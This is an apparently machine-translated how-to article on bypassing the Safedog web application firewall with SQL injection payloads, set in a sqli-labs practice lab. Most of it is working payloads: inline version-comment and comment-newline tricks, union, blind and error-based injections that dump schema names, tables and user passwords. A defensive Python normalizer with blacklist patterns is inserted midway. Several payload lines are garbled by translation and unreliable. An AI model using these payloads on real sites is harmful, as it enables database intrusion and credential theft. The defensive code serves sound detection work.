2025-01-18 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article walks through worked examples of SQL injection payloads that bypass a WAF. The editor considers it quite practical and shares it for your reference; I hope you get something out of it.
How does a WAF defend itself
A WAF tells normal requests from malicious ones by matching them against a set of rules. Examples: Safedog, Cloud Lock (Yunsuo), D Shield and so on.
Bypass: because detection is rule matching, the goal is to craft a request that the rules do not match. A common example is blacklist restrictions; blacklist models use presets
1. Build the SQL injection bypass environment
Windows 7
phpStudy (MySQL 5.7.0, PHP 5.3.29)
Safedog for Apache, website edition (4.0.28330.0)
sqli-labs practice range
Bypass
Set the protection level to the highest:
and 1=1 bypass
First, try 'and 1=1' and 'or 1=1'.
Both are intercepted by the firewall. Next, try replacing the and and or keywords with && and ||.
Still intercepted by Safedog. So work on the 1=1 part instead: either change 1=1 itself, or try inline comments. First, keeping and/or,
change 1=1 to negative numbers: -1=-1
The bypass succeeds, which shows that Safedog does not detect negative numbers.
Then try inline comments:
/ *% "! * / and/*%"! * / 1mm 1muri +-- intercept / *%!% 22pm and + 1MB +-do not intercept
order by bypass:
Just use inline comments:
/ *%!% 22AccordAccordActionorderUniverse%% 22Universe bylines 3murmurs +-- not intercepted; order%23%0Aby 3--+ not intercepted. Once Safedog sees the %23 (#) comment it does not check what follows, so a single-line comment followed by a newline bypasses it.
Safedog generally does not intercept if you pad the order by query with some useless data.
union select bypass
Inline comment injection:
union /*!10440select*/ 1,2,3
You can also fuzz the version number in the middle; the ranges to try: 0440-10449 11440-11449 12440-12449 13440-13449 14400-14499 15440-15449 16440-16449 17440-17449 18440-18449 19440-19449.
Note: MySQL added /*! ... */ comments for compatibility with other databases. So that SQL exported from MySQL still works elsewhere, MySQL-specific syntax is wrapped in /*! ... */, which other databases treat as a comment and skip, while MySQL itself recognises and executes it. /*!50001 ... */ means the enclosed statement is executed only when the server version is >= 5.00.01.
Second method: comment bypass
union%23%0aall select -- union, then a comment plus line break, then all select (union all combines multiple queries)
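As an added defensive example (not code from the original article), the following Python normalizer rewrites each decoded parameter value the way MySQL 5.7.0 would read it, resolving /*!NNNNN ... */ version comments, dropping '#' comments up to the newline and '-- ' comments, and only then applies blacklist rules; it also shows the naive mistake of stripping comments from the whole undecoded query string before splitting parameters. The rule patterns, SERVER_VERSION and the sample query strings are constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Constructed for this example: the lab on the page runs MySQL 5.7.0, which the
# server compares as 50700 when deciding whether a /*!NNNNN ... */ comment runs.
SERVER_VERSION = 50700

# Blacklist rules of the kind the page describes, written against normalized text.
RULES = [re.compile(p) for p in (
    r"(?:\band|\bor|&&|\|\|)\s*-?\d+\s*=\s*-?\d+",
    r"\bunion(?:\s+all)?\s+select\b",
    r"\border\s+by\b",
    r"\b(?:sleep|extractvalue|updatexml)\s*\(",
)]
VERSION_COMMENT = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.S)


def mysql_normalize(value, server_version=SERVER_VERSION):
    """Rewrite one decoded parameter value into the form MySQL actually executes."""
    def resolve(m):  # the body of /*!NNNNN ... */ runs only when NNNNN <= server version
        ver, body = m.group(1), m.group(2)
        return f" {body} " if ver is None or int(ver) <= server_version else " "
    s = VERSION_COMMENT.sub(resolve, value)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # ordinary /* ... */ comments vanish
    s = re.sub(r"#[^\n]*\n", " ", s)              # a '#' comment ends at the newline
    s = re.sub(r"--\s[^\n]*", " ", s)             # '-- ' comment; '--+' decodes to '-- '
    return " ".join(s.split()).lower()

def matched_rules(query_string):
    """Split the query string the way the web server does (so '?/*&id=...*/' yields
    a parameter named '/*' and a separate 'id'), decode, normalize, then match."""
    hits = []
    for _name, value in parse_qsl(query_string.lstrip("?"), keep_blank_values=True):
        norm = mysql_normalize(value)
        hits += [r.pattern for r in RULES if r.search(norm)]
    return hits

def naive_match(query_string):
    """The mistake the page exploits: strip comments from the whole raw, undecoded
    string before splitting parameters, then match."""
    stripped = re.sub(r"/\*.*?\*/", " ", query_string.lower(), flags=re.S)
    return [r.pattern for r in RULES if r.search(stripped)]

if __name__ == "__main__":
    for qs in ("?id=-1' union /*!10440select*/ 1,2,3--+",
               "?id=-1' union /*!99999select*/ 1,2,3--+",
               "?id=1' order%23%0Aby 3--+",
               "?/*&id=-1'union select 1,user(),3--+*/"):
        print(qs, "naive:", bool(naive_match(qs)), "normalized:", bool(matched_rules(qs)))
```

The /*!99999select*/ case is reported clean by both functions, which is correct for a MySQL 5.7.0 backend: the server itself skips a version comment above its own version.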
Injecting functions
Method used: inline comments:
union /*!10440select*/ 1,hex(user/**/()),3
union /*!10440select*/ 1,hex(database/**/()),3
union /*!10440select*/ 1,hex(@@version/**/()),3
union /*!10440select*/ 1,datadir(@@datadir),3
Another way:
?/*&id=-1'union select 1,user(),3--+*/
Here the --+ comment swallows the trailing */, so that what MySQL receives is still a complete SQL statement.
There is no detection for information_schema, so you only need to make sure the preceding union and select get through.
1:
?id=-1'union /*!10440select*/ 1,group_concat(schema_name),3 from information_schema.schemata--+
2:
?/*&id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+*/
?/*&id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+*/
?/*&id=-1'union select 1,username,password from users where id='3'--+*/
With these two methods you can obtain the database's tables, column names and field contents.
Blind injection
1. Time-based blind injection:
Method: inline comments
? / * & id=1' and if (ascii (substr (database (), 1pr 1)) = 115 id=1%27%20and%20if (substr (database/**/ (), 1Pol 1)) = 115 id=1' and if (database (/ *! * /)) = 115 id=1' and if (/ *! * /) 1)-- + * /? id=1' / *! 10440and*/ if (ascii (substr (database/**/ (), 1Magne1)) = 115 Lindsay / (4), 1)-- +
Method: put !, ~ or - in front of if
?id=1' and !if(ascii(substr(database/**/(),1,1))=115,sleep(3),1)--+
?id=1' and ~if(ascii(substr(database/**/(),1,1))=115,sleep(3),1)--+
?id=1' and -if(ascii(substr(database/**/(),1,1))=115,sleep(3),1)--+
Boolean blind injection
Method: inline comments
? id=1' / *! 10440and*/length (database/**/ ()) = 8 and left (database/**/ (), 1) = select%20ifnull (cast (username%20as%20char) = 101--+?/*&id=1%27%20and%20ord (select%20ifnull (cast (username%20as%20char)) 0x20)% 20From% 20security.users% 20order% 23% 0Aby% 20id% 20century% 200Magi 1), 1Jue 1)) = 68muri +
Error-based injection
Bypassing updatexml() and extractvalue(), the functions commonly used in error-based injection
Method: comment + line break.
? / * & id=1%27%20and%20extractvalue%23%0A (1 10440select*/database/**/ concat (0x7e, (/ *! 10440select*/version ()), 0x7e))-+
?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(/*!10440select*/version()),0x7e))--+
Dumping tables:
?/*&id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(select%20group_concat(table_name) from%23%0ainformation_schema.tables%23%0awhere%20table_schema=%27security%27),0x7e))--+*/
?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(select%20group_concat(table_name) from%23%0ainformation_schema.tables%23%0awhere%20table_schema=0x7365637572697479),0x7e))--+
Dumping columns works the same way as tables above. For the field contents you cannot write select username from users limit 1 directly; you have to put a comment and a line break after the from.
?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(select%20username%20from%23%0ausers%20limit%201),0x7e))--+
This concludes the article on "sample analysis of SQL injection bypass". I hope the content above is of some help to you; if you think the article is good, please share it so more people can see it.